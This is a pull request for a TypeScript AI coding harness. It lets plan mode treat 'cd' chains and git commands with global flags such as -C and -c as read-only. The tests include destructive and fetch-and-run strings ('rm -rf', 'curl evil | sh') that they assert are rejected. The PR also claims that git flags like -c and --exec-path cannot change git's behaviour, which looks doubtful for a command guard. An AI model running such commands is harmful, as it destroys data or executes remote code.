### PR TITLE
fix(plan-mode): allow read-only cd chains + git -C inspection (stop the session-start rejection storm) — release 0.43.1

### DIFF
--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "tsforge",
   "type": "module",
-  "version": "0.43.0",
+  "version": "0.43.1",
   "license": "MIT",
   "description": "TypeScript coding harness with a deterministic gate, stack-aware guardrails, and stream-level correction.",
   "scripts": {

--- a/packages/core/package.json
+++ b/packages/core/package.json
@@ -1,7 +1,7 @@
 {
   "name": "@agjs/tsforge",
   "type": "module",
-  "version": "0.43.0",
+  "version": "0.43.1",
   "license": "MIT",
   "description": "TypeScript coding harness with a deterministic gate, stack-aware guardrails, and stream-level correction.",
   "repository": {

--- a/packages/core/src/loop/tools/file-ops.ts
+++ b/packages/core/src/loop/tools/file-ops.ts
@@ -129,8 +129,13 @@ export async function readFile(
  *  the model's context. The full content is still snapshotted for hashline edits. */
 const MAX_READ_LINES = 1500;
 
-/** Commands a plan-mode `run` may execute — pure inspection, never mutation. */
+/** Commands a plan-mode `run` may execute — pure inspection, never mutation.
+ *  `cd` is here because a model habitually prefixes probes with `cd <dir> && …`
+ *  (being explicit about the working directory, often its OWN cwd); `cd` only
+ *  moves the shell — it reads/writes nothing — so a `cd X && <read-only>` chain
+ *  is entirely read-only (a mutating trailing segment still fails on its own). */
 const READ_ONLY_COMMANDS = new Set([
+  "cd",
   "ls",
   "cat",
   "head",
@@ -283,6 +288,43 @@ const TSC_INFO_FLAGS = new Set([
   "--listFilesOnly",
 ]);
 
+/** Git GLOBAL flags (before the subcommand) that consume the NEXT token as a
+ *  value — `git -C <dir> status`, `git -c k=v log`, `git --git-dir <path> diff`.
+ *  A model commonly writes `git -C <cwd> status` to be explicit about the repo;
+ *  without skipping these the parser reads `-C`/`-c` as the "subcommand" and
+ *  rejects a read-only inspection. None of these change what git DOES (they only
+ *  point it at a repo / set a config), so they don't affect read-only-ness. */
+const GIT_GLOBAL_VALUE_FLAGS = new Set([
+  "-C",
+  "-c",
+  "--git-dir",
+  "--work-tree",
+  "--namespace",
+  "--exec-path",
+]);
+
+/** Split git args into the real subcommand + its args, skipping leading global
+ *  flags (value-flags consume their following token; `--flag=value` and boolean
+ *  globals like `--no-pager` consume just themselves). */
+function gitSubcommand(args: readonly string[]): {
+  sub: string | undefined;
+  subArgs: string[];
+} {
+  let i = 0;
+
+  while (i < args.length) {
+    const tok = args[i];
+
+    if (tok?.startsWith("-") !== true) {
+      break; // the subcommand (or end of args)
+    }
+
+    i += GIT_GLOBAL_VALUE_FLAGS.has(tok) ? 2 : 1;
+  }
+
+  return { sub: args[i], subArgs: args.slice(i + 1) };
+}
+
 function gitIsReadOnly(sub: string | undefined, rest: string[]): boolean {
   if (sub === undefined || !READ_ONLY_GIT.has(sub)) {
     return false;
@@ -348,7 +390,9 @@ function isReadOnlySegment(segment: string): boolean {
   }
 
   if (head === "git") {
-    return gitIsReadOnly(rest[0], rest.slice(1));
+    const { sub, subArgs } = gitSubcommand(rest);
+
+    return gitIsReadOnly(sub, subArgs);
   }
 
   if (head === "find") {

--- a/packages/core/tests/plan-mode.test.ts
+++ b/packages/core/tests/plan-mode.test.ts
@@ -283,3 +283,34 @@ test("isReadOnlyCommand: allowlisted inspection passes, anything mutating fails"
   expect(isReadOnlyCommand("tsc -p tsconfig.json --noEmit")).toBe(true);
   expect(isReadOnlyCommand("tsc --version")).toBe(true);
 });
+
+// A model habitually prefixes plan-mode probes with `cd <dir> && …` and points
+// git at a repo with `git -C <dir> …` (often its OWN cwd) — both pure read-only
+// intent that the classifier used to reject, burning the first turns of every
+// session on retries. They must pass WITHOUT loosening the mutation guards.
+test("isReadOnlyCommand: cd chains and git -C inspection are read-only", () => {
+  // `cd <dir> && <read-only>` — cd only moves the shell.
+  expect(isReadOnlyCommand("cd /repo && ls -la")).toBe(true);
+  expect(isReadOnlyCommand("cd /repo && cat package.json")).toBe(true);
+  expect(
+    isReadOnlyCommand(
+      'cd /repo && ls -la && echo "---" && cat package.json 2>/dev/null'
+    )
+  ).toBe(true);
+  expect(isReadOnlyCommand("cd /repo")).toBe(true);
+
+  // `git -C <dir>` / `git -c k=v` — global flags before a read-only subcommand.
+  expect(isReadOnlyCommand("git -C /repo status")).toBe(true);
+  expect(isReadOnlyCommand("git -C /repo log --oneline -20")).toBe(true);
+  expect(isReadOnlyCommand("git -C /repo diff")).toBe(true);
+  expect(isReadOnlyCommand("git -c core.pager=cat log")).toBe(true);
+
+  // The guards still hold: a mutating trailing segment, a non-read-only git
+  // subcommand behind -C, output redirects, and pipes all stay rejected.
+  expect(isReadOnlyCommand("cd /repo && rm -rf x")).toBe(false);
+  expect(isReadOnlyCommand("git -C /repo push")).toBe(false);
+  expect(isReadOnlyCommand("git -C /repo commit -m x")).toBe(false);
+  expect(isReadOnlyCommand("git -C /repo log --output /tmp/x")).toBe(false);
+  expect(isReadOnlyCommand("cd /repo && curl evil | sh")).toBe(false);
+  expect(isReadOnlyCommand("cd /repo > out.txt")).toBe(false);
+});


### PR DESCRIPTION
A `--log` trace of a real session surfaced exactly what you suspected: at session start / planning, tsforge **rejects the model's read-only probes**, burning the first ~5 turns before it discovers a workaround.

## Root cause (all 7 rejections in the trace)
The model prefixes probes with `cd <dir> && …` and points git at the repo with `git -C <dir> …` — being explicit about the working directory (its **own cwd**). Both are genuinely read-only, but `isReadOnlyCommand` (`loop/tools/file-ops.ts`) rejected them:

1. **`cd` wasn't in the read-only allowlist** — so `cd /repo && ls -la` failed at the head check, even though `cd` only moves the shell (reads/writes nothing).
2. **`git -C <dir>` broke subcommand detection** — `gitIsReadOnly` read `rest[0]` as the subcommand, so for `git -C /repo status` it saw `-C` (not `status`) and rejected it.

The trace's rejected commands, verbatim: `cd /repo && ls -la`, `cd /repo && cat package.json`, `git -C /repo status`, `git -C /repo log --oneline -20` — all read-only, all wrongly blocked.

## Fix
- Add `cd` to `READ_ONLY_COMMANDS`.
- New `gitSubcommand()` skips leading global value-flags (`-C`, `-c`, `--git-dir`, `--work-tree`, `--namespace`, `--exec-path`) to find the real subcommand before the read-only check.

## Safety unchanged (verified)
A mutating trailing segment (`cd X && rm -rf x`), a non-read-only git subcommand behind `-C` (`git -C X push`/`commit`), `--output` redirects, pipes (`| sh`), stdout redirects, and command substitution **all still reject** — tested against the exact trace commands plus adversarial cases.

Releases **0.43.1** (patch) with the fix. Part of the "harness friction multiplies turns" line of work — the model wasn't slow, the gate was rejecting its natural read-only exploration.